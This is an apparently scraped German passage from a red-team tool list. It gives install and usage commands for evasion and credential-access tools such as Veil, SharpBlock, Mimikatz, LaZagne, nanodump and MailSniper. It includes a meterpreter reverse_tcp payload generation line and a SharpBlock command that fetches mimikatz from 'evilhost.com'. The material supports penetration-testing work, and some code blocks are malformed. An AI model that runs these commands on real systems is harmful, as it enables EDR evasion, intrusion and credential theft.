      • Sobald das Projekt in Visual Studio geladen ist, gehen Sie zu "Project" --> "Manage NuGet packages" --> Suchen Sie nach Paketen und installieren Sie "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Erstellen Sie das Projekt!
      • Die ImpulsiveDLLHijack.exe befindet sich im bin-Verzeichnis.
    • Und für die Bestätigungs-DLLs:

      • Klonen Sie das Repository in Visual Studio
      • Erstellen Sie das Projekt mit x86 und x64
      • Benennen Sie die x86-Version in maldll32.dll und die x64-Version in maldll64.dll um
    • Einrichtung: Kopieren Sie die Bestätigungs-DLLs (maldll32 & maldll64) in das Verzeichnis der ImpulsiveDLLHijack.exe und führen Sie dann ImpulsiveDLLHijack.exe aus :))

Installationsanweisungen von https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Verwendung:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
Anwendungsbeispiele finden sich [hier](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).

![image](https://assets.kitploit.com/production/public/readmes/495/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

_Bild verwendet von https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples_

### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)

Ein C#-Tool zum Auslesen allerlei nützlicher Informationen aus AD FS.

Erstellt von Doug Bienstock [@doughsec](https://twitter.com/doughsec) während seiner Zeit bei Mandiant FireEye.

Dieses Tool ist für den Einsatz zusammen mit ADFSpoof konzipiert. ADFSdump gibt alle benötigten Informationen aus, um mit ADFSpoof Sicherheitstoken zu generieren.

**Anforderungen:**

- ADFSDump muss im Benutzerkontext des AD FS-Dienstkontos ausgeführt werden. Diese Informationen erhalten Sie durch Auflisten der Prozesse auf dem AD FS-Server oder aus der Ausgabe des Cmdlets Get-ADFSProperties.
- Nur das AD FS-Dienstkonto verfügt über die erforderlichen Berechtigungen, um auf die Konfigurationsdatenbank zuzugreifen. Nicht einmal ein Domänenadministrator (DA) kann darauf zugreifen.
- ADFSDump geht davon aus, dass der Dienst für die Verwendung der Windows Internal Database (WID) konfiguriert ist. Obwohl es trivial wäre, einen externen SQL-Server zu unterstützen, existiert diese Funktion derzeit nicht.
- ADFSDump muss lokal auf einem AD FS-Server ausgeführt werden, NICHT auf einem AD FS-Webanwendungsproxy. Die WID kann nur lokal über eine Named Pipe erreicht werden.

**Installation: (Kompilieren)**

ADFSDump wurde mit Visual Studio 2017 Community Edition gegen .NET 4.5 erstellt. Öffnen Sie einfach die Projektdatei .sln, wählen Sie "Release" und erstellen Sie die Lösung.

**Verwendung: (Flags)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog – Den Golden-SAML-Angriff gegen ADFS erkunden

image

Bild verwendet von https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

Verteidigungsumgehung

🔙Invoke-Obfuscation

Ein PowerShell v2.0+ kompatibler PowerShell-Befehls- und Skript-Obfuskator. Wenn ein Opfer-Endpunkt in der Lage ist, PowerShell auszuführen, ist dieses Tool ideal zum Erstellen stark obfuskierten Skripte.

Installation:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**Verwendung:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veil ist ein Werkzeug zur Generierung von Metasploit-Payloads, die gängige Antivirenlösungen umgehen.

Es kann zur Erzeugung von verschleiertem Shellcode verwendet werden. Weitere Informationen finden Sie im offiziellen Veil-Framework-Blog.

Installation: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**Installation: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Verwendung:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
Die Veil-Entwickler haben einen netten [Blogbeitrag](https://www.veil-framework.com/veil-command-line-usage/) geschrieben, der die weitere Verwendung von Ordnance und Evasion über die Befehlszeile erklärt.

![image](https://assets.kitploit.com/production/public/readmes/495/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

Eine Methode zur Umgehung der aktiven Projektions-DLLs von EDR, indem die Ausführung des Einstiegspunkts verhindert wird.

**Features:**

- Blockiert die Ausführung des Einstiegspunkts von EDR-DLLs, was verhindert, dass EDR-Hooks platziert werden.
- Patchloser AMSI-Bypass, der für Scanner, die zur Laufzeit nach Amsi.dll-Codepatches suchen, nicht erkennbar ist.
- Hostprozess, der durch ein implantierbares PE ersetzt wird, das von Festplatte, HTTP oder Named Pipe (Cobalt Strike) geladen werden kann.
- Der implantierte Prozess ist versteckt, um Scanner zu umgehen, die nach ausgehöhlten Prozessen suchen.
- Befehlszeilenargumente werden gefälscht und nach der Prozesserstellung mit einer heimlichen EDR-Erkennungsmethode implantiert.
- Patchloser ETW-Bypass.
- Blockiert den Aufruf von NtProtectVirtualMemory, wenn der Aufgerufene sich im Adressraum einer blockierten DLL befindet.

**Install:**

Verwenden Sie die [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/), um die SharpBlock-Binärdatei zu kompilieren.

Öffnen Sie die SharpBlock [Projekt-.sln-Datei](https://github.com/CCob/SharpBlock), wählen Sie "Release" und erstellen Sie sie.

**Usage:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Nützlicher PenTestPartners Blogbeitrag hier.

image

Bild verwendet von https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz ist ein GUI x64 Binary-Obfuscator, der verschiedene PE-Dateien verschleiern kann, darunter:

  • .exe
  • .dll
  • .sys

Einige unterstützte Verschleierungsfunktionen umfassen:

  • Verschleierung von Immediate-Moves
  • Kontrollfluss-Abflachung
  • ADD-Mutation
  • Entry-Point-Verschleierung
  • LEA-Verschleierung

Installation: (Anforderungen)

Installieren: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows

root@kitploit:~
**Verwendung:**

Verwendung der GUI zur Obfuskation einer Binärdatei:

1. Laden Sie eine Binärdatei, indem Sie oben links auf `file` klicken.
2. Fügen Sie Funktionen hinzu, indem Sie den `Functions`-Baum erweitern. (Sie können suchen, indem Sie den Namen in die Suchleiste oben eingeben)
3. Drücken Sie `compile` (**Hinweis:** _Das Obfuskieren vieler Funktionen kann einige Sekunden dauern_)

![image](https://assets.kitploit.com/production/public/readmes/495/98ae60c1a4f287f33bd749166514e95f2ba9cdab72850a77025dd743ca52e32a.png)

Bild verwendet von https://github.com/weak1337/Alcatraz

### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)

Mangle ist ein Tool, das Aspekte von kompilierten ausführbaren Dateien (.exe oder DLL) manipuliert.

Mangle kann bekannte indicator-of-Compromise-basierte (IoC) Zeichenfolgen entfernen und durch zufällige Zeichen ersetzen, die Datei durch Vergrößerung der Größe ändern, um EDRs zu umgehen, und Code-Signatur-Zertifikate von legitimen Dateien klonen.

Dadurch hilft Mangle Ladeprogrammen, On-Disk- und In-Memory-Scanner zu umgehen.

**Installation:**

Der erste Schritt ist wie immer das Klonen des Repos. Bevor Sie Mangle kompilieren, müssen Sie die Abhängigkeiten installieren. Führen Sie dazu die folgenden Befehle aus:```
go get github.com/Binject/debug/pe

Dann baue es``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go

root@kitploit:~
**Verwendung:**```bash
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

Vollständige Nutzungsinformationen finden Sie hier.

image

Bild verwendet von https://github.com/optiv/Mangle

🔙AMSI Fail

AMSI.fail ist eine großartige Website, mit der verschleierte PowerShell-Snippets generiert werden können, die AMSI für den aktuellen Prozess deaktivieren oder umgehen.

Die Snippets werden zufällig aus einem kleinen Pool von Techniken/Variationen ausgewählt und dann verschleiert. Jedes Snippet wird zur Laufzeit/auf Anfrage verschleiert, sodass keine generierte Ausgabe dieselben Signaturen aufweist.

Nützlicher f-secure Blog, der AMSI erklärt hier.

image

Bild verwendet von http://amsi.fail/

Zugriff auf Anmeldeinformationen

🔙Mimikatz

Hervorragendes Tool, um Zugriff auf gehashte und Klartext-Passwörter auf einem Opfer-Endpunkt zu erhalten. Sobald Sie privilegierten Zugriff auf ein System erlangt haben, nutzen Sie dieses Tool, um einige Anmeldedaten zu sammeln.

Installation:

  1. Laden Sie die Datei mimikatz_trunk.7z herunter.
  2. Nach dem Herunterladen befindet sich die ausführbare Datei mimikatz.exe im Ordner x64.

Verwendung:```bash .\mimikatz.exe privilege::debug

root@kitploit:~
![Bild](https://assets.kitploit.com/production/public/readmes/495/a66e3040f581c95c762704952a34495375ffc7d58ad12074d747869851a40ad6.png)

### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)

Nützliches Tool zum Extrahieren lokal gespeicherter Passwörter aus Browsern, Datenbanken, Spielen, E‑Mail, Git, WLAN usw.

**Installation: (Binärdatei)**

Sie können die eigenständige Binärdatei von [hier](https://github.com/AlessandroZ/LaZagne/releases/) installieren.

**Verwendung:**```bash
# Launch all modes
.\laZagne.exe all

# Launch only a specific module
.\laZagne.exe browsers

# Launch only a specific software script
.\laZagne.exe browsers -firefox

image

🔙hashcat

Tool zum Knacken von Passwort-Hashes. Unterstützt eine große Liste von Hash-Algorithmen (Die vollständige Liste finden Sie hier).

Install: Binary

Sie können das Standalone-Binary von hier installieren.

Usage:```bash .\hashcat.exe --help

root@kitploit:~
Netter hashcat-Befehl [Spickzettel](https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/).

![image](https://assets.kitploit.com/production/public/readmes/495/94e510535cc8f8fa1853dfc04b4c17963ff9a1771e43f3cfad93c9699442e0d6.png)

### [🔙](#tool-list)[John the Ripper](https://github.com/openwall/john)

Ein weiterer Passwortknacker, der Hunderte von Hash- und Chiffretypen unterstützt und auf vielen Betriebssystemen, CPUs und GPUs läuft.

**Installation:**```bash
sudo apt-get install john -y

Verwendung:```bash john

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/36fca17b620393b7e2406306d90155436188b2032a7a0dfe07ada24a5e1f6579.png)

### [🔙](#tool-list)[SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt)

Dieses Tool dient zum Abrufen und Entschlüsseln von RunAs-Anmeldeinformationen, die in Microsoft System Center Operations Manager (SCOM)-Datenbanken gespeichert sind.

NCC-Blogbeitrag – [„SCOMplicated? – Decrypting SCOM “RunAs” credentials“](https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/)

**Voraussetzungen:**

Um das Tool auszuführen, benötigen Sie Administratorrechte auf dem SCOM-Server. Sie müssen außerdem sicherstellen, dass Sie Lesezugriff auf den folgenden Registrierungsschlüssel haben:```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins

Sie können manuell überprüfen, ob Sie die Datenbank sehen können, indem Sie die Verbindungsdetails aus den folgenden Schlüsseln sammeln:``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName

root@kitploit:~
**Installieren: (PS1)**```
git clone https://github.com/nccgroup/SCOMDecrypt
cd .\SCOMDecrypt\SCOMDecrypt\
. .\Invoke-SCOMDecrypt.ps1

Installation: (Kompilieren)

Mit Visual Studio 2019 Community Edition können Sie die SCOMDecrypt-Binärdatei kompilieren.

Öffnen Sie die SCOMDecrypt Projekt .sln, wählen Sie 'Release', und erstellen Sie.

Nutzung:```bash

PS1

Invoke-SCOMDecrypt

Compiled C# binary

.\SCOMDecrypt.exe

root@kitploit:~
![Bild](https://assets.kitploit.com/production/public/readmes/495/fe1dd762d4cb4590a60e45aad6088e96138f152205c6048c9cf2ddea900bdac9.png)

_Bildtext verwendet von https://github.com/nccgroup/SCOMDecrypt_

### [🔙](#tool-list)[nanodump](https://github.com/helpsystems/nanodump)

Der LSASS (Local Security Authority Subsystem Service) ist ein Systemprozess im Windows-Betriebssystem, der für die Durchsetzung der Sicherheitsrichtlinie auf dem System zuständig ist. Er ist für eine Reihe von sicherheitsrelevanten Aufgaben verantwortlich, darunter die Authentifizierung von Benutzern für die Anmeldung, die Durchsetzung von Sicherheitsrichtlinien und die Erstellung von Audit-Logs.

Das Erstellen eines Dumps dieses Prozesses kann es einem Angreifer ermöglichen, Passwort-Hashes oder andere sensible Informationen aus dem Speicher des Prozesses zu extrahieren, die für eine weitere Kompromittierung des Systems verwendet werden könnten.

Dies ermöglicht die Erstellung eines Minidumps des LSASS-Prozesses.

**Installation:**```bash
git clone https://github.com/helpsystems/nanodump.git

Installieren: (Linux with MinGW)```bash make -f Makefile.mingw

root@kitploit:~
**Installieren: (Windows mit MSVC)**```bash
nmake -f Makefile.msvc

Installation: (nur CobaltStrike)

Importieren Sie das Skript NanoDump.cna in Cobalt Strike.

Vollständige Installationsinformationen finden Sie hier.

Verwendung:```bash

Run

nanodump.x64.exe

Leverage the Silent Process Exit technique

nanodump --silent-process-exit C:\Windows\Temp\

Leverage the Shtinkering technique

nanodump --shtinkering

root@kitploit:~
Die vollständige Nutzungsinformationen finden Sie [hier](https://github.com/helpsystems/nanodump#1-usage).

![nanodump](https://assets.kitploit.com/production/public/readmes/495/6e7fe4b0b8bf59311dd6fc422ae0f2d27c3e6eae77da978ffb495ec294749596.jpg)

_Bild verwendet von https://github.com/helpsystems/nanodump_

### [🔙](#tool-list)[eviltree](https://github.com/t3l3machus/eviltree)

Ein eigenständiger Python3-Nachbau des klassischen "tree"-Befehls mit der zusätzlichen Funktion, nach benutzerdefinierten Schlüsselwörtern/Regex in Dateien zu suchen und diejenigen hervorzuheben, die Treffer enthalten. Entwickelt aus zwei Hauptgründen:

- Bei der Suche nach Geheimnissen in Dateien von verschachtelten Verzeichnisstrukturen bietet es einen erheblichen Vorteil, visualisieren zu können, welche Dateien vom Benutzer bereitgestellte Schlüsselwörter/Regex-Muster enthalten und wo sich diese Dateien in der Hierarchie der Ordner befinden.
- `tree` ist ein großartiges Werkzeug zur Analyse von Verzeichnisstrukturen. Es ist sehr praktisch, eine eigenständige Alternative des Befehls für die Post-Exploitation-Erkundung zu haben, da es nicht auf jeder Linux-Distribution vorinstalliert ist und unter Windows (im Vergleich zur UNIX-Version) etwas eingeschränkt ist.

**Installation:**```bash
git clone https://github.com/t3l3machus/eviltree

Verwendung:```bash

Running a regex that essentially matches strings similar to: password = something against /var/www

python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v

Using comma separated keywords instead of regex

python3 eviltree.py -r C:\Users\USERNAME -k passw,admin,account,login,user -L 3 -v

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/ad11b6297c86be15d9f3a51d45f9f25bda572bac8dd2e39a3d46c33f88fa43dc.png)

_Image used from https://github.com/t3l3machus/eviltree_

### [🔙](#tool-list)[SeeYouCM-Thief](https://github.com/trustedsec/SeeYouCM-Thief)

Einfaches Werkzeug zum automatischen Herunterladen und Parsen von Konfigurationsdateien aus Cisco-Telefonsystemen auf der Suche nach SSH-Anmeldeinformationen.

Wird optional auch Active Directory-Benutzer über die UDS-API aufzählen.

[Blog - Ausnutzung häufiger Fehlkonfigurationen in Cisco-Telefonsystemen](https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/)

**Installation:**```bash
git clone https://github.com/trustedsec/SeeYouCM-Thief
python3 -m pip install -r requirements.txt

Verwendung:```bash

Enumerate Active Directory users from the UDS api on the CUCM

./thief.py -H --userenum

Without specifying a phone IP address the script will attempt to download every config in the listing.

./thief.py -H [--verbose]

Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.

./thief.py --phone [--verbose]

Specify a subnet to scan with reverse lookups.

./thief.py --subnet [--verbose]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/e5711956a7db9d9750077ca3be1c9de261642de6fc954b37878095dd25741d80.png)

_Bild verwendet von https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/_

### [🔙](#tool-list)[MailSniper](https://github.com/dafthack/MailSniper)

MailSniper ist ein Penetrationstest-Werkzeug zum Durchsuchen von E-Mails in einer Microsoft Exchange-Umgebung nach bestimmten Begriffen (Passwörter, Insider-Informationen, Netzwerkarchitektur-Details usw.). Es kann von einem nicht-administrativen Benutzer verwendet werden, um die eigenen E-Mails zu durchsuchen, oder von einem Exchange-Administrator, um die Postfächer aller Benutzer in einer Domäne zu durchsuchen.

MailSniper enthält außerdem zusätzliche Module für Password Spraying, das Aufzählen von Benutzern und Domänen, das Abrufen der globalen Adressliste (GAL) über OWA und EWS sowie die Überprüfung der Postfachberechtigungen für jeden Exchange-Benutzer in einer Organisation.

Ein netter Blogbeitrag mit weiteren Informationen [hier](https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/).

[MailSniper Field Manual](http://www.dafthack.com/files/MailSniper-Field-Manual.pdf)

**Installation:**```
git clone https://github.com/dafthack/MailSniper
cd MailSniper
Import-Module MailSniper.ps1

Verwendung:```bash

Search current users mailbox

Invoke-SelfSearch -Mailbox [email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/b1b906ecbe7771ed394a43a8a5dae4bf68e14d70108c967f7f490aeb8dd519bd.png)

_Bild von https://patrowl.io/_

# Erkennung

### [🔙](#tool-list)[PCredz](https://github.com/lgandx/PCredz)

Dieses Tool extrahiert Kreditkartennummern, NTLM (DCE-RPC, HTTP, SQL, LDAP, usw.), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, usw. aus einer pcap-Datei oder von einer Live-Schnittstelle.

**Installation:**```bash
git clone https://github.com/lgandx/PCredz

Verwendung: (PCAP-Dateiordner)```python python3 ./Pcredz -d /tmp/pcap-directory-to-parse/

root@kitploit:~
**Verwendung:** (Live-Erfassung)```python
python3 ./Pcredz -i eth0 -v

image

🔙PingCastle

Ping Castle ist ein Tool, das entwickelt wurde, um schnell die Sicherheitsstufe von Active Directory mit einer auf Risikobewertung und einem Reifegradmodell basierenden Methodik zu beurteilen. Es zielt nicht auf eine perfekte Bewertung ab, sondern eher auf einen Effizienzkompromiss.

Installation: (Download)``` https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip

root@kitploit:~
**Verwendung:**```python
./PingCastle.exe

image

🔙Seatbelt

Seatbelt ist ein nützliches Tool, um detaillierte Informationen über die Sicherheitslage eines Ziel-Windows-Systems zu sammeln und so potenzielle Schwachstellen und Angriffsvektoren zu identifizieren.


Read more

Tool herunterladen